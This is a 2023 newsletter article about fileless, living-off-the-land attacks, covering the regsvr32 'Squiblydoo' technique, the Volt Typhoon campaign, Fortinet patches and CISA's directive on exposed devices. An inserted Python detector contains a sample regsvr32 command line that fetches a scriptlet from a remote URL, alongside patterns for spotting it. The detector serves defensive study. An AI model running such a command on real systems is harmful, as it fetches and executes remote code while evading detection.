Newsletter 8/05/2023


The Game Has Changed:
Fileless Malware and Hackers Living Off the Land, Part 2

In 2022, the Microsoft Windows operating system was victimized when a vulnerability in a standard Windows utility, regsvr32.exe, was attacked.  Dubbed the "Squiblydoo" technique, threat actors inject a tiny script of code "directly from the internet" and then "execute it."  Since the attack does not make any real changes to the Windows Registry, but simply executes the script, and no rogue apps are downloaded, there is little for traditional antimalware techniques and applications to detect.  So, like all ongoing criminal conspiracies, the lack of detection of their criminal activities guarantees the crooks' success until such detection is made. 
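One way a defender can flag the regsvr32.exe behaviour described above in process-creation logs, as an added example that is not from the newsletter or any of the reports it cites: the log events are constructed, and the match on a remote /i: URL and on scrobj.dll follows the publicly documented shape of the Squiblydoo command line, which is an assumption beyond what the article itself states.

```python
import re

# Constructed sample process-creation events, in the shape a SIEM export might use.
SAMPLE_EVENTS = [
    {"pid": 101, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\plugin.dll"},
    {"pid": 102, "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll"},
    {"pid": 103, "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "cmdline": r"regsvr32.exe /u C:\Temp\helper.dll"},
    {"pid": 104, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe notes.txt"},
]

# The /i: switch normally takes a local path; a URL there means the script is
# fetched from the internet, which is the point of the technique.
URL_INSTALL = re.compile(r'/i:\s*"?(https?|ftp)://', re.IGNORECASE)


def classify_regsvr32(event):
    """Return the reasons an event looks like Squiblydoo, or [] if it looks benign.

    Only regsvr32.exe launches are examined; a plain local DLL (un)registration,
    as in events 101 and 103, produces no reasons.
    """
    if not event["image"].lower().endswith("\\regsvr32.exe"):
        return []
    cmd = event["cmdline"]
    reasons = []
    if URL_INSTALL.search(cmd):
        reasons.append("remote /i: URL")
    if "scrobj.dll" in cmd.lower():
        reasons.append("scrobj.dll scriptlet host")
    silent = re.search(r"\s/s\b", cmd, re.IGNORECASE)
    unregister = re.search(r"\s/u\b", cmd, re.IGNORECASE)
    if silent and unregister and reasons:
        # Silent + unregister only matters when combined with a remote script.
        reasons.append("silent unregister flags combined with remote script")
    return reasons


def find_suspicious(events):
    """Return (pid, reasons) for every event that triggers at least one reason."""
    hits = []
    for event in events:
        reasons = classify_regsvr32(event)
        if reasons:
            hits.append((event["pid"], reasons))
    return hits
```

Running find_suspicious(SAMPLE_EVENTS) flags only PID 102, with all three reasons, while the ordinary DLL registrations pass untouched.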

The use of an otherwise legitimate built-in tool to facilitate an attack without making any actual modification to the system in general is the textbook definition of a Living Off the Land attack.  Indeed, like hungry bears let loose in a campground, today's hackers are Getting Fat Living Off the Land. 

And, since they have to abbreviate every phrase these days, it's called LOTLLMFAO!

The Volt Typhoon attack brought LOTL attacks to the forefront of the news over the past few months.  Not only have US-based cyber security agencies sounded the alarm over Volt Typhoon, so have their counterparts in other countries.  The Sydney Morning Herald, May 25, 2023, reported on the Australian government's participation in, and being a signatory to, the Joint Cybersecurity Advisory, entitled, "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection," released by CISA, May 24, 2023.  What was most alarming to the Australian government was that Chinese cyber espionage actors were able to penetrate security at American military installations at Guam, a South Pacific neighbor of Australia.  Home Affairs Minister Clare O’Neil is quoted as saying: "The Australian government has joined with a number of other security agencies from around the world to advise that there have been evidence-based attacks on critical infrastructure associated with the United States and that the origin of those attacks has been the Chinese government."

The first report of Volt Typhoon, which came from Microsoft, dated May 24, 2023, entitled, "Volt Typhoon targets US critical infrastructure with living-off-the-land techniques," mentions in its second paragraph that "Volt Typhoon has been active since mid-2021 and has targeted critical infrastructure organizations in Guam and elsewhere in the United States."  MS goes on to state that "initial access to targeted organizations through internet-facing Fortinet FortiGuard devices" had been the first attack vector.  As Fortinet describes its affected products, "The FortiGuard Device Security suite offers advanced security technologies optimized to monitor and protect IoT and OT devices against device and vulnerability-based attack tactics."  Once inside the compromised network, the attacker directs all its traffic through proxy networks, with all data collected sent "through compromised SOHO network edge devices (including routers)," according to the MS report.  Microsoft then goes on to name several popular brands of home and small office routers as vulnerable to this compromise, including Cisco, D-Link, and NETGEAR.

On June 12, 2023, CISA announced the first of a series of patches that Fortinet released over June and July 2023.  The June 12 announcement, "Fortinet Releases Security Updates for FortiOS and FortiProxy," makes reference to and links to Fortinet's discussion of the Volt Typhoon Campaign.  July 11, 2023, CISA announced the same Fortinet products were patched again. 

Meanwhile, while all this Whole Lotta Patching is or is not Going On, the media outlets that report on such topics are sounding the big alarm bells about what might be the long-term strategic implications of the breadth of the Volt Typhoon attack.  The July 31, 2023, Dark Reading article, "China's Volt Typhoon APT Burrows Deeper Into US Critical Infrastructure," quotes the New York Times' initial reporting on the breadth of the Volt Typhoon attack.  The Dark Reading article points out the difficulty in mitigating all instances of the attack.  The attackers can be present "inside numerous networks controlling the communications, power, and water feeding US military bases at home and abroad."  Moreover, since all networks regardless of scope or size connect to the same Internet, "those same networks also touch run of the mill businesses and individuals as well — and investigators are having a hard time assessing the full footprint of the infestation," reported Dark Reading.

Writing in Government Technology, July 31, 2023, Greg Jefferson, Business and Metro Editor of the San Antonio Express-News, expressed well the real fear that citizens of San Antonio, TX feel as their city may well be at ground zero for these attacks.  Jefferson quoted John Dickson, a San Antonio-based cybersecurity consultant and former Air Force intelligence officer, who explained that in many ways San Antonio is a Company Town of the US Department of Defense that is especially at risk from the possible fallout from Volt Typhoon.  "We are Military City, USA, and a sophisticated reader doesn't have to do too much to connect the dots," is how Dickson expressed the threat faced by San Antonio, Texas.

The US Military is certainly well represented in San Antonio.  Several major military facilities are located in San Antonio.  Among those listed in the govtech.com article are "Fort Sam Houston, the largest military medical training installation in the U.S., as well as to JBSA-Randolph and JBSA-Lackland Air Force bases."  On the cyberwar front, San Antonio is also home to the National Security Agency's Texas Cryptologic Center.  Of the Texas Cryptologic Center, Jefferson noted that, "The center conducts worldwide signals intelligence and cybersecurity operations. Signals intelligence involves collecting, decoding and interpreting electronic communications."  Indeed, San Antonio, the second most populated city in Texas, and the seventh largest city in these US of A, represents an irresistible target for our nation's enemies in the ongoing cyberwar.

It is an unfortunate fact that the Federal Government can do little to impose its cyber security dictates on vulnerable consumers and their computer usage.  Uncle Sam does, however, hold great sway over those entities whose networks intersect and interconnect with those of the Federal Government.  On June 13, 2023, CISA released "Binding Operational Directive 23-02: Mitigating the Risk from Internet-Exposed Management Interfaces."  Essentially, CISA will give network admins 14 days from the BOD release to remove vulnerable devices from any Internet-connected network.  After the 14 days, CISA will scan federal networks for, among other things, "Devices residing on or supporting federal information systems and/or networks that belong to one of the following classes: routers, switches, firewalls, VPN concentrators," that are not in compliance.  Those responsible for any at-risk devices will be notified by CISA and given support and guidance on how best to mitigate the vulnerabilities. 

The explicit purpose here is to remove these vulnerable devices from any network that touches the Federal Government.  "Inadequate security, misconfigurations, and out of date software make these devices more vulnerable to exploitation," and are therefore part of the reasons for CISA's actions here.  Furthermore, as Matt Hayden, a former CISA official and currently an executive at General Dynamics Information Technology, told The Federal News Network, June 13, 2023, unlike many CISA advisories, patching alone will not mitigate the risk that these devices vulnerable to Volt Typhoon represent.  "The latest BOD directs agencies to remove such devices from the internet or provide the additional “zero trust” protections, regardless of whether a patch has been applied or not," Hayden said.

As Ronen Ahdut wrote in an article entitled "The Volt Typhoon wake-up call," which appeared in scmagazine.com, June 6, 2023, the "covert installation of sleeper software in a system lets a threat actor execute a future attack," and can be likened to "Cold War-era fears that “sleeper” saboteurs from the Soviet Union were laying the groundwork for future attacks."   All Computer Users should heed the advice of Ronen Ahdut when the writer reminds us all that, although "State-backed threat actors are rapidly proliferating," we must "Make it harder for them to reach the end of the rainbow." 

Volt Typhoon should serve as a wake-up call to all computer Consumers, one that informs Consumers in the clearest terms possible that that old Router has got to go.  If not for their own sake, then how about for the sake of San Antonio, Texas?

¯\_(ツ)_/¯
Gerald Reiff
